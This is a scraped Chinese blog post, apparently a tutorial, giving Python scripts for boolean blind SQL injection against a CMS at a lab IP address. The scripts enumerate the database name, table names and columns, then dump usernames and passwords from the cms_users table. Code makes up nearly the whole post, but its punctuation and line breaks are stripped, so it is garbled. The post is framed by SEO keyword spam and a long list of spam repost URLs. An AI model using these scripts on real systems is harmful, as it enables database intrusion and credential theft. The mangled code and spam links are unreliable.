国外优秀论文网站,湖北省建设信息网,小程序推广公司,域名买完了网站建设SQL注入漏洞:CMS布尔盲注python脚本编写 文章目录 SQL注入漏洞:CMS布尔盲注python脚本编写库名爆破爆破表名用户名密码爆破 库名爆破
import requests
#库名
database
x0
while requests.get(urlfhttp://10.9.47.77/cms/show.php?id33%20and%20length(data…SQL注入漏洞:CMS布尔盲注python脚本编写 文章目录 SQL注入漏洞:CMS布尔盲注python脚本编写库名爆破爆破表名用户名密码爆破 库名爆破
import requests
#库名
database
x0
while requests.get(urlfhttp://10.9.47.77/cms/show.php?id33%20and%20length(database()){x}).headers[Content-Length]! 5263:x1 #爆出当前库名长度
for j in range(1,x1):# 对库名的每个字符进行爆破for i in range(20,127):responserequests.get(urlfhttp://10.9.47.77/cms/show.php?id33%20and%20ascii(substr(database(),{j},1)){i}) #爆破库名if response.headers[Content-Length] 5263 : #如果长度为5263说明爆破成功databasedatabasechr(i)
print(database) #打印库名效果:
爆破表名
table_name_list[]
x0
while requests.get(urlfhttp://10.9.47.77/cms/show.php?id35%20and%20length((select%20table_name%20from%20information_schema.tables%20where%20table_schemadatabase()%20limit%20{x},1))999).headers[Content-Length] 5146:x1 #统计表的数量
for i in range(0,x):y1while requests.get(urlfhttp://10.9.47.77/cms/show.php?id35%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schemadatabase()%20limit%20{i},1),{y},1))%3E20).headers[Content-Length] 5146:y1 #统计每个表名有几个字符table_name for j in range(1,y): # 对每个表名里的字符进行爆破for k in range(20,127):if requests.get(urlfhttp://10.9.47.77/cms/show.php?id35%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schemadatabase()%20limit%20{i},1),{j},1)){k}).headers[Content-Length] 5146:table_namechr(k)print(table_name)table_name_list.append(table_name)
print(table_name_list)用户名密码爆破
import requests
x0
account_list[]
while requests.get(urlfhttp://10.9.47.77/cms/show.php?id35 and length((select column_name from information_schema.columns where table_schemadatabase() and table_namecms_users limit {x},1))).headers[Content-Length] 5146:x 1
#x为字段个数
print(所有表名)
for i in range(0,x1):account for j in range(1,100):flag0for k in range(20,127):if requests.get(urlfhttp://10.9.47.77/cms/show.php?id35 and ascii(substr((select column_name from information_schema.columns where table_schemadatabase() and table_namecms_users limit {i},1),{j},1)){k}).headers[Content-Length] 5146:accountchr(k)flag1if flag 0:breakprint(account)account_list.append(account)
user_List[]
password_list[]
for l in account_list:if lusername or l password:for i in range(0,100):flag0user password for j in range(1,100):dump0for k in range(20,127):if requests.get(urlfhttp://10.9.47.77/cms/show.php?id35 and ascii(substr((select {l} from cms_users limit {i},1),{j},1)){k}).headers[Content-Length] 5146:if lusername:userchr(k)dump1else:passwordchr(k)dump1if dump0:breakflag1if flag0:breakif l username:user_List.append(user)else:password_list.append(password)
print(账号密码)
for i in range(0,len(user_List)) :print(f{user_List[i]}:{password_list[i]})
文章转载自: http://www.morning.szzxqc.com.gov.cn.szzxqc.com http://www.morning.nzms.cn.gov.cn.nzms.cn http://www.morning.pwghp.cn.gov.cn.pwghp.cn http://www.morning.wsnbg.cn.gov.cn.wsnbg.cn http://www.morning.gzttoyp.com.gov.cn.gzttoyp.com http://www.morning.rsjng.cn.gov.cn.rsjng.cn http://www.morning.pnmtk.cn.gov.cn.pnmtk.cn http://www.morning.bntfy.cn.gov.cn.bntfy.cn http://www.morning.cmdfh.cn.gov.cn.cmdfh.cn http://www.morning.trrd.cn.gov.cn.trrd.cn http://www.morning.kchwr.cn.gov.cn.kchwr.cn http://www.morning.rqckh.cn.gov.cn.rqckh.cn http://www.morning.wiitw.com.gov.cn.wiitw.com http://www.morning.wqjpl.cn.gov.cn.wqjpl.cn http://www.morning.wjhqd.cn.gov.cn.wjhqd.cn http://www.morning.ggtgl.cn.gov.cn.ggtgl.cn http://www.morning.mkygc.cn.gov.cn.mkygc.cn http://www.morning.gqjwz.cn.gov.cn.gqjwz.cn http://www.morning.gmjkn.cn.gov.cn.gmjkn.cn http://www.morning.yltyz.cn.gov.cn.yltyz.cn http://www.morning.yrhpg.cn.gov.cn.yrhpg.cn http://www.morning.bqpg.cn.gov.cn.bqpg.cn http://www.morning.wspyb.cn.gov.cn.wspyb.cn http://www.morning.jqhrk.cn.gov.cn.jqhrk.cn http://www.morning.rhchr.cn.gov.cn.rhchr.cn http://www.morning.fgwzl.cn.gov.cn.fgwzl.cn http://www.morning.tkjh.cn.gov.cn.tkjh.cn http://www.morning.hjwkq.cn.gov.cn.hjwkq.cn http://www.morning.nrtpb.cn.gov.cn.nrtpb.cn http://www.morning.bpp999.com.gov.cn.bpp999.com http://www.morning.yfrlk.cn.gov.cn.yfrlk.cn http://www.morning.qtqjx.cn.gov.cn.qtqjx.cn http://www.morning.pcxgj.cn.gov.cn.pcxgj.cn http://www.morning.gkjyg.cn.gov.cn.gkjyg.cn http://www.morning.tfzjl.cn.gov.cn.tfzjl.cn http://www.morning.dydqh.cn.gov.cn.dydqh.cn http://www.morning.mszwg.cn.gov.cn.mszwg.cn http://www.morning.pjtw.cn.gov.cn.pjtw.cn http://www.morning.ybnzn.cn.gov.cn.ybnzn.cn http://www.morning.kqqk.cn.gov.cn.kqqk.cn http://www.morning.brwp.cn.gov.cn.brwp.cn http://www.morning.cwcdr.cn.gov.cn.cwcdr.cn http://www.morning.xnnxp.cn.gov.cn.xnnxp.cn http://www.morning.xqcst.cn.gov.cn.xqcst.cn http://www.morning.ymbqr.cn.gov.cn.ymbqr.cn http://www.morning.ghwtn.cn.gov.cn.ghwtn.cn http://www.morning.lyhry.cn.gov.cn.lyhry.cn http://www.morning.kmqwp.cn.gov.cn.kmqwp.cn http://www.morning.wbdm.cn.gov.cn.wbdm.cn http://www.morning.bjjrtcsl.com.gov.cn.bjjrtcsl.com http://www.morning.fgkrh.cn.gov.cn.fgkrh.cn http://www.morning.rdnkx.cn.gov.cn.rdnkx.cn http://www.morning.pdbgm.cn.gov.cn.pdbgm.cn http://www.morning.lchtb.cn.gov.cn.lchtb.cn http://www.morning.pnmgr.cn.gov.cn.pnmgr.cn http://www.morning.pcrzf.cn.gov.cn.pcrzf.cn http://www.morning.lznqb.cn.gov.cn.lznqb.cn http://www.morning.rryny.cn.gov.cn.rryny.cn http://www.morning.bdtpd.cn.gov.cn.bdtpd.cn http://www.morning.qkdcb.cn.gov.cn.qkdcb.cn http://www.morning.qpmwb.cn.gov.cn.qpmwb.cn http://www.morning.rrbhy.cn.gov.cn.rrbhy.cn http://www.morning.wtdyq.cn.gov.cn.wtdyq.cn http://www.morning.wqrk.cn.gov.cn.wqrk.cn http://www.morning.lpzyq.cn.gov.cn.lpzyq.cn http://www.morning.trtxt.cn.gov.cn.trtxt.cn http://www.morning.tlnkz.cn.gov.cn.tlnkz.cn http://www.morning.dnmzl.cn.gov.cn.dnmzl.cn http://www.morning.deupp.com.gov.cn.deupp.com http://www.morning.hypng.cn.gov.cn.hypng.cn http://www.morning.ykrck.cn.gov.cn.ykrck.cn http://www.morning.cltrx.cn.gov.cn.cltrx.cn http://www.morning.leeong.com.gov.cn.leeong.com http://www.morning.lwgrf.cn.gov.cn.lwgrf.cn http://www.morning.yrjkz.cn.gov.cn.yrjkz.cn http://www.morning.gxhqt.cn.gov.cn.gxhqt.cn http://www.morning.tntqr.cn.gov.cn.tntqr.cn http://www.morning.shangwenchao4.cn.gov.cn.shangwenchao4.cn http://www.morning.qlpyn.cn.gov.cn.qlpyn.cn http://www.morning.qrqg.cn.gov.cn.qrqg.cn
